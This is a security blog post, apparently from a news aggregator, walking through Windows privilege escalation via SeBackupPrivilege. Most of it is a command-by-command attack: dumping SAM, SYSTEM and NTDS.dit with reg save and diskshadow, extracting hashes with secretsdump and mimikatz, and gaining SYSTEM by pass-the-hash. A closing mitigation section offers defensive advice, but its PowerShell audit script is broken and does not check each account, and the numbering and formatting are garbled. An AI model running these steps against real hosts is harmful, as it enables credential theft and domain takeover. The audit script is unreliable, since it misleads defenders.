Listen to this Post
Introduction:
SeBackupPrivilege is a powerful Windows user right that allows a process to bypass file system Access Control Lists (ACLs) for backup purposes. When an attacker gains initial access with this privilege enabled, they can read any file on the system—including the Security Account Manager (SAM), SYSTEM registry hive, and even the Active Directory database (NTDS.dit)—without ever needing to modify permissions, making it a stealthy yet devastating vector for privilege escalation to Administrator or SYSTEM.
Learning Objectives:
- Understand how SeBackupPrivilege bypasses standard file permissions and why it’s a critical escalation vector.
- Execute a step‑by‑step attack workflow to dump SAM/SYSTEM hives, extract NTLM hashes, and escalate to SYSTEM.
- Apply practical mitigation techniques, including privilege removal and detection strategies, to harden Windows environments.
You Should Know:
1. Understanding SeBackupPrivilege and Why Attackers Love It
SeBackupPrivilege is often assigned to backup operators or specific service accounts. Unlike other privileges that require explicit write access, this right allows reading any file by telling the Windows kernel to ignore ACL checks. Attackers who discover this privilege on a compromised host can extract credential material without triggering file access audit logs.
Step‑by‑step guide to identify the privilege:
- Gain a shell on a Windows machine (e.g., via phishing or service exploit).
- Run the following command to list all enabled privileges:
whoami /priv
3. Look for `SeBackupPrivilege` with `Enabled` status.
- Confirm you can use backup semantics by attempting to read a protected file (e.g.,
C:\Windows\System32\config\SAM) – direct read will fail, but backup APIs will succeed.
2. Enumerating Privileges on a Compromised Windows Host
Before executing the attack, enumerate the environment. This step verifies that SeBackupPrivilege is active and that the user has the necessary SeRestorePrivilege (for writing later) or alternative methods to exfiltrate data.
Commands and tools:
- Windows (CMD / PowerShell):
List privileges whoami /priv Get current user SID and token information whoami /all Check if SeBackupPrivilege is present using PowerShell Get-WmiObject -Class Win32_UserAccount | Select-Object Name, SID
- Using PowerUp (PowerShell privilege escalation script):
Import-Module .\PowerUp.ps1 Invoke-AllChecks
- Manual registry check for backup groups:
net localgroup "Backup Operators"
If the privilege is present but disabled, attackers can enable it using `AdjustTokenPrivileges` – but many offensive tools (like `mimikatz` or `sebackup_privesc` scripts) handle this automatically.
- Dumping SAM and SYSTEM Hives Using Built‑in Windows Tools
Once SeBackupPrivilege is confirmed, the next step is to copy the protected registry hives. Because the privilege grants read access via backup APIs, we can use `reg.exe` with the `save` option (which uses backup semantics) or leverage `diskshadow` to create a shadow copy.
Step‑by‑step manual dump (no third‑party tools required):
1. Create a directory for exfiltration:
mkdir C:\Temp\exfil
2. Save SAM and SYSTEM hives:
reg save hklm\sam C:\Temp\exfil\sam.hive reg save hklm\system C:\Temp\exfil\system.hive
These commands succeed because `reg save` internally uses `REG_BACKUP` access, which is allowed by SeBackupPrivilege.
3. For a Domain Controller (NTDS.dit): Use `diskshadow` to create a volume shadow copy:diskshadow /s script.txt
Where `script.txt` contains:
set context persistent nowriters add volume C: alias someAlias create expose %someAlias% Z:
Then copy `Z:\Windows\NTDS\NTDS.dit` to `C:\Temp\exfil\`.
- Transfer the hives to your attacker machine (via SMB, HTTP upload, or encoded base64).
4. Extracting NTLM Hashes with Impacket or Mimikatz
With the hive files on your Linux attack box (or using a Windows tool), extract NTLM hashes. The most reliable method is `impacket-secretsdump` from the Impacket suite.
Linux commands:
Install impacket (if not already) pip3 install impacket Extract hashes from SAM and SYSTEM impacket-secretsdump -sam sam.hive -system system.hive LOCAL For NTDS.dit with bootkey from SYSTEM hive impacket-secretsdump -ntds ntds.dit -system system.hive LOCAL
Windows alternative (Mimikatz):
After transferring the hives back to a Windows machine (or on the target if allowed):
mimikatz.exe "lsadump::sam /sam:C:\Temp\exfil\sam.hive /system:C:\Temp\exfil\system.hive" exit
Output example:
`Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::`
The second hash is the NTLM hash. Use it for pass‑the‑hash attacks.
- Escalating to SYSTEM via Pass‑the‑Hash or Token Manipulation
With the extracted NTLM hash of an elevated user (e.g., Administrator or Domain Admin), you can gain SYSTEM privileges without ever cracking the password.
Step‑by‑step pass‑the‑hash using Impacket on Linux:
Use the hash to get a SYSTEM shell on the target impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 [email protected]
Windows native method (using `wmiexec.vbs` or `mimikatz`):
Mimikatz can also inject the hash into the current process to impersonate a token:
mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:target.local /ntlm:31d6cfe0d16ae931b73c59d7e0c089c0" exit
After this, a new command prompt with the stolen token will open, granting SYSTEM access.
Verification:
`whoami` should return `nt authority\system`.
6. Mitigation Strategies: Removing SeBackupPrivilege and Monitoring
Defenders should treat SeBackupPrivilege as a high‑value target. Here’s how to harden systems:
Remove the privilege from non‑backup accounts:
- Open `Local Security Policy` → `User Rights Assignment` → `Back up files and directories` and
Restore files and directories. - Remove any users or groups that do not explicitly need backup capabilities.
- Use Group Policy to enforce this across domain controllers and member servers.
Detection and monitoring:
- Windows Event Logs:
Enable auditing for `Privilege Use` (Event ID 4672 – Special privileges assigned to new logon). Look for SeBackupPrivilege being used by unexpected processes. - Command line monitoring:
Log execution of `reg save hklm\sam` ordiskshadow. These are rare in normal operations. - Sysmon configuration:
Monitor for `Event ID 1` (process creation) with command lines containingsam,system,ntds.dit.
Linux/Windows command to check for privilege assignments (audit script):
PowerShell: List all users with SeBackupPrivilege
$privilege = "SeBackupPrivilege"
$output = @()
$accounts = Get-WmiObject Win32_Account | Where-Object {$_.SID -match "S-1-5-21"}
foreach ($account in $accounts) {
$sid = $account.SID
$result = whoami /priv | Select-String $privilege
if ($result) { $output += $account.Name }
}
$output | Out-File C:\Logs\backup_priv_users.txt
- Bonus: Targeting Domain Controllers – Full Active Directory Compromise
On a Domain Controller, SeBackupPrivilege is even more dangerous because it allows dumping the NTDS.dit file, which contains NTLM hashes for every domain user.
Step‑by‑step to dump NTDS.dit using only Windows native tools:
1. Create a shadow copy (as shown in section 3).
2. Copy NTDS.dit – note that the file is locked by Active Directory, but a shadow copy bypasses this.
copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Temp\exfil\
3. Also copy the SYSTEM hive from the same shadow copy to get the bootkey.
4. Exfiltrate and extract using impacket-secretsdump on your attacker Linux machine.
5. Result: NTLM hashes for every domain user, including krbtgt, enabling Golden Ticket attacks.
What Undercode Say:
- SeBackupPrivilege is a silent killer: Unlike SeDebugPrivilege or SeTakeOwnershipPrivilege, it doesn’t require process injection or file ownership changes, making it harder to detect via traditional EDR rules that monitor for suspicious API calls like
OpenProcess. Attackers simply read files – an action that blends into legitimate backup traffic. - Defense is about removal, not detection alone: The most effective mitigation is to strip SeBackupPrivilege from every account except dedicated, monitored backup service accounts. Use “Just Enough Administration” (JEA) to grant backup rights only via temporary, auditable sessions.
- Hive dumping via reg save is under‑monitored: Many organizations fail to log `reg save` operations because they don’t consider them a threat. Pairing Sysmon with custom rules that flag `reg save` on SAM or SYSTEM hives can catch 90% of manual attacks. For NTDS.dit, monitor `diskshadow` creation and volume mount events.
- Pass‑the‑hash remains viable: Even in 2026, many Windows environments have not enabled Credential Guard or restricted NTLM authentication. SeBackupPrivilege feeds directly into PtH, enabling lateral movement without ever needing plaintext passwords.
Prediction:
As Windows environments continue to shift toward cloud‑native identity (Azure AD, Entra ID), on‑prem Active Directory will remain a legacy backbone for hybrid setups. Attackers will increasingly target backup privileges because they circumvent modern EDRs that focus on memory injection and LSASS dumping. We predict a rise in “backup‑first” ransomware groups that exploit SeBackupPrivilege to exfiltrate NTDS.dit before encrypting, using the extracted hashes to disable recovery options. Mitigations will evolve toward ephemeral backup accounts with just‑in‑time (JIT) privilege elevation and mandatory Credential Guard enforcement. However, until Microsoft makes backup APIs require explicit logging and consent, SeBackupPrivilege will remain a top‑10 Windows escalation vector.
▶️ Related Video (66% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Windows Privilege – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
